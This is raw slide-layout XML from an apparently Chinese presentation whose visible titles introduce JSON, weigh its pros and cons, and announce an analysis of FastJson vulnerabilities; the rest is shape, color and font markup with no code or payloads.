            <a:gd name="adj3" fmla="val 176"/>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A93503-3E0E-462F-B452-6621C02C79EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1266536" y="912490"/>
          <a:ext cx="12014416" cy="1824981"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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8579" tIns="165100" rIns="165100" bIns="165100" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="2889250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="6500" b="1" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>JSON</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="6500" b="1" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>的介绍</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6500" b="1" kern="1200" dirty="0">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1266536" y="912490"/>
        <a:ext cx="12014416" cy="1824981"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FDC6EB65-5604-46E1-8758-C40216518B24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="125923" y="684367"/>
          <a:ext cx="2281226" cy="2281226"/>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95185E-8336-432A-9543-F833582B0B43}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1929917" y="3649962"/>
          <a:ext cx="11351035" cy="1824981"/>
        </a:xfrm>
        <a:prstGeom prst="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8579" tIns="165100" rIns="165100" bIns="165100" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="2889250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="6500" b="1" i="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>JSON</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="6500" b="1" i="0" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>技术的简介和优劣</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6500" kern="1200" dirty="0">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1929917" y="3649962"/>
        <a:ext cx="11351035" cy="1824981"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F849A9D3-79B3-42A6-82A0-F7009478B6FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="789304" y="3421839"/>
          <a:ext cx="2281226" cy="2281226"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:hueOff val="-498774"/>
              <a:satOff val="3810"/>
              <a:lumOff val="-3137"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="1">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{94DEAEA8-2C1C-4EF5-85E6-266D8D1DDB4A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1266536" y="6387433"/>
          <a:ext cx="12014416" cy="1824981"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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8579" tIns="165100" rIns="165100" bIns="165100" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="2889250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="6500" b="1" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>FastJson</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="6500" b="1" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:rPr>
            <a:t>漏洞分析</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6500" b="1" kern="1200" dirty="0">
            <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1266536" y="6387433"/>
        <a:ext cx="12014416" cy="1824981"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FE831F20-BAED-4280-BD82-9567563446FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="125923" y="6159310"/>
          <a:ext cx="2281226" cy="2281226"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="lt1">
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:hueOff val="-997548"/>
              <a:satOff val="7621"/>
              <a:lumOff val="-6275"/>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61DFFFC9-8D0C-4803-A1B7-5C5C2D2E3581}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/11/1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符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D90BE1D-F894-4B25-9EB3-DD507FA72BF2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3945152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90488" y="744538"/>
            <a:ext cx="6616700" cy="3722687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 41"/>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567433200"/>
      </p:ext>
    </p:extLst>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1179493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42987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06026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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402298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79171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90623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97709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27286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58404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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2171071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352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67997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63946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75757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4122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83687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577292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25554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20353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29575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60873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1478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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30508768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448853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14282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98467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225629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70014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46716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461774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77496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07233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7428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5477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83770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8923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2740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照片 - 水平">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1032000" y="1891688"/>
            <a:ext cx="22320000" cy="43200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C3267"/>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055"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FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRP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0622125" y="893756"/>
            <a:ext cx="2729875" cy="808043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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30" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9724" y="-23813"/>
            <a:ext cx="24364553" cy="13763626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C3367"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="48220" tIns="48220" rIns="48220" bIns="48220" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1285875">
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DengXian"/>
                <a:ea typeface="DengXian"/>
                <a:cs typeface="DengXian"/>
                <a:sym typeface="DengXian"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="DengXian"/>
              <a:ea typeface="DengXian"/>
              <a:cs typeface="DengXian"/>
              <a:sym typeface="DengXian"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12370136" y="8077762"/>
            <a:ext cx="5611684" cy="60185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038" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16213" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16668049" y="2693392"/>
            <a:ext cx="10690135" cy="11280769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="15625" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5977" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15625" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>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75032" y="6343714"/>
            <a:ext cx="2107936" cy="1028571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12370136" y="8077762"/>
            <a:ext cx="5611684" cy="60185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038" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16213" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16668049" y="2693392"/>
            <a:ext cx="10690135" cy="11280769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="15625" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5977" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15625" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="27697841" cy="14305935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155032" y="1395663"/>
            <a:ext cx="5510463" cy="1297729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C3267"/>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055"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FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片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1272632" y="1015956"/>
            <a:ext cx="2107936" cy="102857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iming>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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1pPr>
      <a:lvl2pPr marL="0" marR="0" indent="22860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2pPr>
      <a:lvl3pPr marL="0" marR="0" indent="45720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3pPr>
      <a:lvl4pPr marL="0" marR="0" indent="68580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4pPr>
      <a:lvl5pPr marL="0" marR="0" indent="91440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5pPr>
      <a:lvl6pPr marL="0" marR="0" indent="114300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6pPr>
      <a:lvl7pPr marL="0" marR="0" indent="137160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7pPr>
      <a:lvl8pPr marL="0" marR="0" indent="160020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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="182880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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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22860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45720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68580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91440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114300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137160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160020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182880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1pPr>
      <a:lvl2pPr marL="0" marR="0" indent="22860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2pPr>
      <a:lvl3pPr marL="0" marR="0" indent="45720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3pPr>
      <a:lvl4pPr marL="0" marR="0" indent="68580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4pPr>
      <a:lvl5pPr marL="0" marR="0" indent="91440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5pPr>
      <a:lvl6pPr marL="0" marR="0" indent="114300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6pPr>
      <a:lvl7pPr marL="0" marR="0" indent="137160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7pPr>
      <a:lvl8pPr marL="0" marR="0" indent="160020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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="182880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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12370136" y="8077762"/>
            <a:ext cx="5611684" cy="60185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038" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="14352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16213" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16668049" y="2693392"/>
            <a:ext cx="10690135" cy="11280769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="wd2" y="hd2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="15625" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5977" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15625" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="53578" tIns="53578" rIns="53578" bIns="53578" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="27697841" cy="14305935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155032" y="1395663"/>
            <a:ext cx="5510463" cy="1297729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C3267"/>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endParaRPr lang="zh-CN" altLang="en-US" sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片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0959148" y="1395663"/>
            <a:ext cx="2107936" cy="1028571"/>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spd="med"/>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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1pPr>
      <a:lvl2pPr marL="0" marR="0" indent="22860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2pPr>
      <a:lvl3pPr marL="0" marR="0" indent="45720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3pPr>
      <a:lvl4pPr marL="0" marR="0" indent="68580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4pPr>
      <a:lvl5pPr marL="0" marR="0" indent="91440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5pPr>
      <a:lvl6pPr marL="0" marR="0" indent="114300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6pPr>
      <a:lvl7pPr marL="0" marR="0" indent="137160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7pPr>
      <a:lvl8pPr marL="0" marR="0" indent="160020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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="1828800" algn="ctr" defTabSz="821055" rtl="0" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzTx/>
        <a:buFontTx/>
        <a:buNone/>
        <a:defRPr sz="10800" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Light"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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1pPr>
      <a:lvl2pPr marL="0" marR="0" indent="22860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2pPr>
      <a:lvl3pPr marL="0" marR="0" indent="45720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3pPr>
      <a:lvl4pPr marL="0" marR="0" indent="68580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4pPr>
      <a:lvl5pPr marL="0" marR="0" indent="91440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5pPr>
      <a:lvl6pPr marL="0" marR="0" indent="114300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6pPr>
      <a:lvl7pPr marL="0" marR="0" indent="137160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7pPr>
      <a:lvl8pPr marL="0" marR="0" indent="160020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8pPr>
